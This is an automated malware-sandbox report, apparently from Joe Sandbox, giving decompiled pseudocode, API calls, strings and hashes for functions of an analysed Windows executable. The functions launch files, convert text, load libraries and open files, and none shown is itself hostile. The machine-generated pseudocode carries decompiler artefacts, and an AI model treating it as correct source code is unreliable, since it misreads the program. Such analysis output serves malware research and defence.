Instruction Fuzzy Hash: B831C172145342AFE301EF209C4AFAB7FECEB9AB44F408518F551D72A0DF658A048776

Uniqueness

Uniqueness Score: -1.00%

Function 00B7D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00B7D78F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				long _v12;
				void* __edi;
				int _t47;
				signed int _t50;
				void* _t51;
				signed short* _t53;
				long _t64;
				signed int _t71;
				void* _t72;
				signed short _t73;
				int _t74;
				void* _t76;
				signed int _t77;
				intOrPtr _t78;
				long _t80;
				signed int _t81;
				void* _t82;
				void* _t84;
				signed int _t86;
				signed short* _t87;
				struct HWND__* _t88;
				void* _t89;
				void* _t92;

				_t89 = __ebp;
				_t47 = E00B7EC50(0x1040);
				_t87 = _a4168;
				_t74 = 0;
				if( *_t87 == 0) {
					L54:
					return _t47;
				}
				_t47 = E00B83E13(_t87);
				if(_t47 >= 0x7f6) {
					goto L54;
				} else {
					_t80 = 0x3c;
					E00B7FFF0(_t80,  &_a4, 0, _t80);
					_t78 = _a4176;
					_t92 = _t92 + 0xc;
					_a4.cbSize = _t80;
					_a8 = 0x1c0;
					if(_t78 != 0) {
						_a8 = 0x5c0;
					}
					_t50 =  *_t87 & 0x0000ffff;
					_push(_t89);
					_t76 = 0x22;
					_t81 = _t50;
					_t77 = _t74;
					if(_t50 != _t76) {
						_t90 = _t87;
						_a20 = _t87;
						goto L16;
					} else {
						_t90 =  &(_t87[1]);
						_a20 =  &(_t87[1]);
						L6:
						_t51 = 0x22;
						if(_t81 != _t51) {
							L13:
							_t82 = 0x20;
							_t53 =  &(( &(_t87[1]))[_t77]);
							if(_t87[_t77] == _t82) {
								_t87[_t77] = 0;
								L48:
								_a24 = _t53;
								L18:
								if(_t53 == 0 ||  *_t53 == _t74) {
									if(_t78 == 0 &&  *0xbab472 != _t74) {
										_a24 = 0xbab472;
									}
								}
								_a32 = _a4172;
								_t84 = E00B6B92D(_t90);
								if(_t84 != 0 && E00B71FBB(_t84, L".inf") == 0) {
									_a16 = L"Install";
								}
								if(E00B6A231(_a20) != 0) {
									E00B6B6C4(_a20,  &_a64, 0x800);
									_a8 =  &_a52;
								}
								_t47 = ShellExecuteExW( &_a4); // executed
								if(_t47 != 0) {
									_t88 = _a4160;
									if( *0xba9468 != _t74 || _a4172 != _t74 ||  *0xbb7b7a != _t74) {
										if(_t88 != 0) {
											_push(_t88);
											if( *0xbc30a8() != 0) {
												ShowWindow(_t88, _t74);
												_t74 = 1;
											}
										}
										 *0xbc30a4(_a56, 0x7d0);
										E00B7DC3B(_a48);
										if( *0xbb7b7a != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
											_t64 = _v12;
											if(_t64 >  *0xbbfca4) {
												 *0xbbfca4 = _t64;
											}
											 *0xbb7b7b = 1;
										}
									}
									CloseHandle(_a48);
									if(_t84 == 0 || E00B71FBB(_t84, L".exe") != 0) {
										_t47 = _a4164;
										if( *0xba9468 != 0 && _t47 == 0 &&  *0xbb7b7a == _t47) {
											 *0xbbfca8 = 0x1b58;
										}
									} else {
										_t47 = _a4164;
									}
									if(_t74 != 0 && _t47 != 0) {
										_t47 = ShowWindow(_t88, 1);
									}
								}
								goto L54;
							}
							if( *_t53 == 0x2f) {
								goto L48;
							}
							_t77 = _t77 + 1;
							_t50 = _t87[_t77] & 0x0000ffff;
							_t81 = _t50;
							L16:
							if(_t50 != 0) {
								goto L6;
							}
							_t53 = _a24;
							goto L18;
						} else {
							while(1) {
								_t77 = _t77 + 1;
								_t71 = _t87[_t77] & 0x0000ffff;
								_t86 = _t71;
								if(_t71 == 0) {
									break;
								}
								_t72 = 0x22;
								if(_t86 == _t72) {
									_t73 = 0x20;
									_t87[_t77] = _t73;
									goto L13;
								}
							}
							goto L13;
						}
					}
				}
			}

0x00b7d78f
0x00b7d794
0x00b7d79b
0x00b7d7a2
0x00b7d7a7
0x00b7d9ea
0x00b7d9f0
0x00b7d9f0
0x00b7d7ae
0x00b7d7b9
0x00000000
0x00b7d7bf
0x00b7d7c2
0x00b7d7ca
0x00b7d7cf
0x00b7d7d6
0x00b7d7d9
0x00b7d7dd
0x00b7d7e7
0x00b7d7e9
0x00b7d7e9
0x00b7d7f1
0x00b7d7f4
0x00b7d7f7
0x00b7d7fb
0x00b7d7fd
0x00b7d7ff
0x00b7d812
0x00b7d814
0x00000000
0x00b7d801
0x00b7d801
0x00b7d804
0x00b7d808
0x00b7d80a
0x00b7d80e
0x00b7d837
0x00b7d839
0x00b7d83d
0x00b7d844
0x00b7d9c2
0x00b7d9c6
0x00b7d9c6
0x00b7d864
0x00b7d866
0x00b7d86f
0x00b7d87a
0x00b7d87a
0x00b7d86f
0x00b7d88a
0x00b7d893
0x00b7d898
0x00b7d8a9
0x00b7d8a9
0x00b7d8bc
0x00b7d8cc
0x00b7d8d5
0x00b7d8d5
0x00b7d8de
0x00b7d8e6
0x00b7d8ec
0x00b7d8f9
0x00b7d90e
0x00b7d910
0x00b7d919
0x00b7d91d
0x00b7d923
0x00b7d923
0x00b7d919
0x00b7d92e
0x00b7d938
0x00b7d944
0x00b7d963
0x00b7d96d
0x00b7d96f
0x00b7d96f
0x00b7d974
0x00b7d974
0x00b7d944
0x00b7d97f
0x00b7d987
0x00b7d99f
0x00b7d9a6
0x00b7d9b4
0x00b7d9b4
0x00b7d9cf
0x00b7d9cf
0x00b7d9cf
0x00b7d9d8
0x00b7d9e1
0x00b7d9e1
0x00b7d9d8
0x00000000
0x00b7d9e7
0x00b7d84e
0x00000000
0x00000000
0x00b7d854
0x00b7d855
0x00b7d859
0x00b7d85b
0x00b7d85e
0x00000000
0x00000000
0x00b7d860
0x00000000
0x00b7d810
0x00b7d822
0x00b7d822
0x00b7d823
0x00b7d827
0x00b7d82c
0x00000000
0x00000000
0x00b7d81c
0x00b7d820
0x00b7d832
0x00b7d833
0x00000000
0x00b7d833
0x00b7d820
0x00000000
0x00b7d82e
0x00b7d80e
0x00b7d7ff

APIs

_wcslen.LIBCMT ref: 00B7D7AE
ShellExecuteExW.SHELL32(?), ref: 00B7D8DE
ShowWindow.USER32(?,00000000), ref: 00B7D91D
GetExitCodeProcess.KERNEL32 ref: 00B7D959
CloseHandle.KERNEL32(?), ref: 00B7D97F
ShowWindow.USER32(?,00000001), ref: 00B7D9E1

Strings

.inf, xrefs: 00B7D89A
.exe, xrefs: 00B7D989

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 90c2a5574ed80aa20ba4c278a4f4bf77abcc6e77965d1795e85b056656e25953
Instruction ID: 6791887cf4a1a8176bc59af66f1966653293ea4594adbd287adceafe5ec512f4
Opcode Fuzzy Hash: 90c2a5574ed80aa20ba4c278a4f4bf77abcc6e77965d1795e85b056656e25953
Instruction Fuzzy Hash: AE51E8711083809EDB319F24D844BABBBF4EF85784F04849DF6E9971A1DBB1C984DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E00B8A95B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t70;
				int _t79;
				void* _t81;
				short* _t82;
				signed int _t88;
				signed int _t91;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				int _t105;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t79 = E00B8EF4C(_a16, _t103);
					_t110 = _t79 - _t103;
					_t4 = _t79 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t79;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t81);
					return E00B7FBBC(_t54, _t81, _v8 ^ _t106, _t96, _t99, _t104);
				} else {
					_t96 = _t54 + _t54;
					_t86 = _t96 + 8;
					asm("sbb eax, eax");
					if((_t96 + 0x00000008 & _t54) == 0) {
						_t82 = 0;
						__eflags = 0;
						L14:
						if(_t82 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00B8ABC3(_t82);
							_t54 = _t105;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t82, _v12);
						_t121 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t59 = E00B8AF6C(_t82, _t86, _v12, _t121, _a8, _a12, _t82, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t59;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t88 = _t96 + 8;
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							__eflags = _t88 & _t59;
							if((_t88 & _t59) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00B8ABC3(_t101);
									goto L36;
								}
								_t61 = E00B8AF6C(_t82, _t88, _t101, __eflags, _a8, _a12, _t82, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00B8ABC3(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t91 = _t96 + 8;
							__eflags = _t96 - _t91;
							asm("sbb eax, eax");
							_t65 = _t59 & _t91;
							_t88 = _t96 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t96 - _t88;
								asm("sbb eax, eax");
								_t101 = E00B88E06(_t88, _t65 & _t88);
								_pop(_t88);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							E00B92010(_t65 & _t88);
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t105 = E00B8AF6C(_t82, 0, _t100, _t125, _a8, _a12, _t82, _t100, _a24, _t70, 0, 0, 0);
						if(_t105 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t96 + 0x00000008;
					_t86 = _t96 + 8;
					if((_t54 & _t96 + 0x00000008) > 0x400) {
						__eflags = _t96 - _t86;
						asm("sbb eax, eax");
						_t82 = E00B88E06(_t86, _t72 & _t86);
						_pop(_t86);
						__eflags = _t82;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t82 = 0xdddd;
						L12:
						_t82 =  &(_t82[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00B92010(_t72 & _t86);
					_t82 = _t107;
					if(_t82 == 0) {
						goto L36;
					}
					 *_t82 = 0xcccc;
					goto L12;
				}
			}

0x00b8a960
0x00b8a961
0x00b8a962
0x00b8a969
0x00b8a96e
0x00b8a974
0x00b8a97a
0x00b8a980
0x00b8a983
0x00b8a983
0x00b8a986
0x00b8a988
0x00b8a988
0x00b8a986
0x00b8a98a
0x00b8a98f
0x00b8a996
0x00b8a999
0x00b8a999
0x00b8a9b5
0x00b8a9bb
0x00b8a9c0
0x00b8ab53
0x00b8ab56
0x00b8ab57
0x00b8ab58
0x00b8ab66
0x00b8a9c6
0x00b8a9c6
0x00b8a9c9
0x00b8a9ce
0x00b8a9d2
0x00b8aa26
0x00b8aa26
0x00b8aa28
0x00b8aa2a
0x00b8ab48
0x00b8ab48
0x00b8ab4a
0x00b8ab4b
0x00b8ab51
0x00000000
0x00b8ab51
0x00b8aa3b
0x00b8aa41
0x00b8aa43
0x00000000
0x00000000
0x00b8aa49
0x00b8aa5b
0x00b8aa60
0x00b8aa64
0x00000000
0x00000000
0x00b8aa71
0x00b8aaab
0x00b8aaae
0x00b8aab1
0x00b8aab3
0x00b8aab5
0x00b8aab7
0x00b8ab03
0x00b8ab03
0x00b8ab05
0x00b8ab05
0x00b8ab07
0x00b8ab41
0x00b8ab42
0x00000000
0x00b8ab47
0x00b8ab1b
0x00b8ab20
0x00b8ab22
0x00000000
0x00000000
0x00b8ab26
0x00b8ab27
0x00b8ab28
0x00b8ab2b
0x00b8ab67
0x00b8ab6a
0x00b8ab2d
0x00b8ab2d
0x00b8ab2e
0x00b8ab2e
0x00b8ab3b
0x00b8ab3d
0x00b8ab3f
0x00b8ab70
0x00000000
0x00000000
0x00000000
0x00000000
0x00b8ab3f
0x00b8aab9
0x00b8aabc
0x00b8aabe
0x00b8aac0
0x00b8aac2
0x00b8aac5
0x00b8aaca
0x00b8aae5
0x00b8aae7
0x00b8aaf1
0x00b8aaf3
0x00b8aaf4
0x00b8aaf6
0x00000000
0x00000000
0x00b8aaf8
0x00b8aafe
0x00b8aafe
0x00000000
0x00b8aafe
0x00b8aacc
0x00b8aace
0x00b8aad2
0x00b8aad7
0x00b8aad9
0x00b8aadb
0x00000000
0x00000000
0x00b8aadd
0x00000000
0x00b8aadd
0x00b8aa73
0x00b8aa78
0x00000000
0x00000000
0x00b8aa7e
0x00b8aa80
0x00000000
0x00000000
0x00b8aa9c
0x00b8aaa0
0x00000000
0x00000000
0x00000000
0x00b8aaa6
0x00b8a9d9
0x00b8a9db
0x00b8a9dd
0x00b8a9e5
0x00b8aa04
0x00b8aa06
0x00b8aa10
0x00b8aa12
0x00b8aa13
0x00b8aa15
0x00000000
0x00000000
0x00b8aa1b
0x00b8aa21
0x00b8aa21
0x00000000
0x00b8aa21
0x00b8a9e9
0x00b8a9ed
0x00b8a9f2
0x00b8a9f6
0x00000000
0x00000000
0x00b8a9fc
0x00000000
0x00b8a9fc

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00B857FB,00B857FB,?,?,?,00B8ABAC,00000001,00000001,2DE85006), ref: 00B8A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00B8ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00B8AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00B8AB35
__freea.LIBCMT ref: 00B8AB42

Part of subcall function 00B88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B84286,?,0000015D,?,?,?,?,00B85762,000000FF,00000000,?,?), ref: 00B88E38

__freea.LIBCMT ref: 00B8AB4B
__freea.LIBCMT ref: 00B8AB70

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d48edba24dde942d0d8580a5db80017f05e88c06909026399fb220c58629d99b
Instruction ID: 6f7dffe98eff89f8d030c16b82aa2442d1a33a4e2b0539d34d91eb808c8e03bf
Opcode Fuzzy Hash: d48edba24dde942d0d8580a5db80017f05e88c06909026399fb220c58629d99b
Instruction Fuzzy Hash: DB51C272600216ABFB25AF64CC81EBBB7EAEB44750F1546AAFD04D6160EB34DC50C792

Uniqueness

Uniqueness Score: -1.00%

Function 00B83B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B83B72(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0xbc20e0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0xb962b4 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00B86088(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00b83b79
0x00b83bee
0x00b83b7e
0x00b83b80
0x00b83b87
0x00b83b8c
0x00b83b95
0x00b83ba4
0x00b83ba7
0x00b83bad
0x00b83bb1
0x00b83bfa
0x00b83bfc
0x00b83c00
0x00b83c03
0x00b83c03
0x00b83c09
0x00b83c09
0x00b83bf5
0x00b83bf9
0x00b83bf9
0x00b83bb3
0x00b83bbc
0x00b83be6
0x00b83be9
0x00b83beb
0x00b83beb
0x00000000
0x00b83beb
0x00b83bbe
0x00b83bc9
0x00b83bce
0x00b83bd3
0x00000000
0x00000000
0x00b83bda
0x00b83be0
0x00b83be4
0x00000000
0x00000000
0x00000000
0x00b83be4
0x00b83b91
0x00000000
0x00000000
0x00000000
0x00b83b93
0x00b83bf3
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,00B83C35,00000000,00000FA0,00BC2088,00000000,?,00B83D60,00000004,InitializeCriticalSectionEx,00B96394,InitializeCriticalSectionEx,00000000), ref: 00B83C03

Strings

api-ms-, xrefs: 00B83BC3

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 2fe9b212575412e0bc648c3d07307b95c3af3fd0165ee3d532a5c45367dd8164
Instruction ID: 7073357e22ad662ade9de86ef64a3325b1ddb6b3e30819b64deaef2a67c41e7a
Opcode Fuzzy Hash: 2fe9b212575412e0bc648c3d07307b95c3af3fd0165ee3d532a5c45367dd8164
Instruction Fuzzy Hash: 9211CA71A45221ABCB21AB689C41B5937E4DF01F70F1501A1E915FB1A0EB71EF00C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00B7ABAB(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00B71FBB( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}

0x00b7abbb
0x00b7abc2
0x00b7abca
0x00b7abcd
0x00b7abda
0x00b7abe1
0x00b7abe9
0x00b7abef
0x00b7abef
0x00b7abf1
0x00b7abf4
0x00b7abf9
0x00000000
0x00b7abf9
0x00b7ac01

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00B7ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00B7ABF9

Part of subcall function 00B71FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00B6C116,00000000,.exe,?,?,00000800,?,?,?,00B78E3C), ref: 00B71FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00B7ABE9

Strings

pldv, xrefs: 00B7ABF9
EDIT, xrefs: 00B7ABCD, 00B7ABD8, 00B7ABE5

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT$pldv
API String ID: 4243998846-1058243852
Opcode ID: 09d392a29f22dbbc3b30e6cf779174b745ec5fdec342b1daceb7cb9d02eb6108
Instruction ID: 1cf377876727631e13a0ea27c45801765d08be28807e906b0ccaf46c39cde747
Opcode Fuzzy Hash: 09d392a29f22dbbc3b30e6cf779174b745ec5fdec342b1daceb7cb9d02eb6108
Instruction Fuzzy Hash: 27F0823360022876DB2057649C09F9F76EC9B86F40F4880A1BA49A7180DB64EE4185B6

Uniqueness

Uniqueness Score: -1.00%

Function 00B698E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00B698E0(void* __ecx, void* __esi, signed int _a4, short _a8, WCHAR* _a4180, unsigned int _a4184) {
				struct _FILETIME _v0;
				char _t38;
				void* _t40;
				long _t52;
				unsigned int _t53;
				long _t56;
				signed int _t57;
				void* _t61;
				void* _t62;
				long _t68;
				void* _t70;

				_t62 = __esi;
				E00B7EC50(0x1050);
				_t53 = _a4184;
				_t61 = __ecx;
				 *(__ecx + 0x1034) =  *(__ecx + 0x1034) & 0x00000000;
				if( *((char*)(__ecx + 0x30)) != 0 || (_t53 & 0x00000004) != 0) {
					_t38 = 1;
				} else {
					_t38 = 0;
				}
				_push(_t62);
				_t68 = ( !(_t53 >> 1) & 0x00000001) + 1 << 0x1e;
				if((_t53 & 0x00000001) != 0) {
					_t68 = _t68 | 0x40000000;
				}
				_t56 =  !(_t53 >> 3) & 0x00000001;
				if(_t38 != 0) {
					_t56 = _t56 | 0x00000002;
				}
				E00B66EDB( &_a8);
				if( *((char*)(_t61 + 0x24)) != 0) {
					_t68 = _t68 | 0x00000100;
				}
				_t40 = CreateFileW(_a4180, _t68, _t56, 0, 3, 0x8000000, 0); // executed
				_t70 = _t40;
				if(_t70 != 0xffffffff) {
					goto L15;
				} else {
					_v0.dwLowDateTime = GetLastError();
					if(E00B6BB03(_a4180,  &_a8, 0x800) == 0) {
						L16:
						if(_v0.dwLowDateTime == 2) {
							 *((intOrPtr*)(_t61 + 0x1034)) = 1;
						}
						L18:
						if( *((char*)(_t61 + 0x24)) != 0 && _t70 != 0xffffffff) {
							_v0.dwLowDateTime = _v0.dwLowDateTime | 0xffffffff;
							_a4 = _a4 | 0xffffffff;
							SetFileTime(_t70, 0,  &_v0, 0);
						}
						 *((char*)(_t61 + 0x1c)) = 0;
						 *((intOrPtr*)(_t61 + 0x10)) = 0;
						_t30 = _t70 != 0xffffffff;
						_t57 = _t56 & 0xffffff00 | _t30;
						 *((char*)(_t61 + 0x15)) = 0;
						if(_t30 != 0) {
							 *(_t61 + 8) = _t70;
							E00B70602(_t61 + 0x32, _a4180, 0x800);
							 *((char*)(_t61 + 0x25)) = 0;
						}
						return _t57;
					}
					_t70 = CreateFileW( &_a8, _t68, _t56, 0, 3, 0x8000000, 0);
					_t52 = GetLastError();
					if(_t52 == 2) {
						_v0.dwLowDateTime = _t52;
					}
					L15:
					if(_t70 != 0xffffffff) {
						goto L18;
					}
					goto L16;
				}
			}

0x00b698e0
0x00b698e5
0x00b698eb
0x00b698f4
0x00b698f6
0x00b69901
0x00b6990c
0x00b69908
0x00b69908
0x00b69908
0x00b6990e
0x00b69919
0x00b6991f
0x00b69921
0x00b69921
0x00b6992c
0x00b69931
0x00b69933
0x00b69933
0x00b6993a
0x00b69943
0x00b69945
0x00b69945
0x00b6995f
0x00b69965
0x00b6996a
0x00000000
0x00b6996c
0x00b69972
0x00b6998e
0x00b699c8
0x00b699cd
0x00b699cf
0x00b699cf
0x00b699d9
0x00b699de
0x00b699e5
0x00b699ee
0x00b699f9
0x00b699f9
0x00b69a04
0x00b69a07
0x00b69a0a
0x00b69a0a
0x00b69a0d
0x00b69a10
0x00b69a21
0x00b69a25
0x00b69a2a
0x00b69a2a
0x00b69a39
0x00b69a39
0x00b699a8
0x00b699aa
0x00b699b3
0x00b699b5
0x00b699b5
0x00b699c3
0x00b699c6
0x00000000
0x00000000
0x00000000
0x00b699c6

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00B67760,?,00000005,?,00000011), ref: 00B6995F
GetLastError.KERNEL32(?,?,00B67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B6996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00B67760,?,00000005,?), ref: 00B699A2
GetLastError.KERNEL32(?,?,00B67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B699AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00B67760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B699F9

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

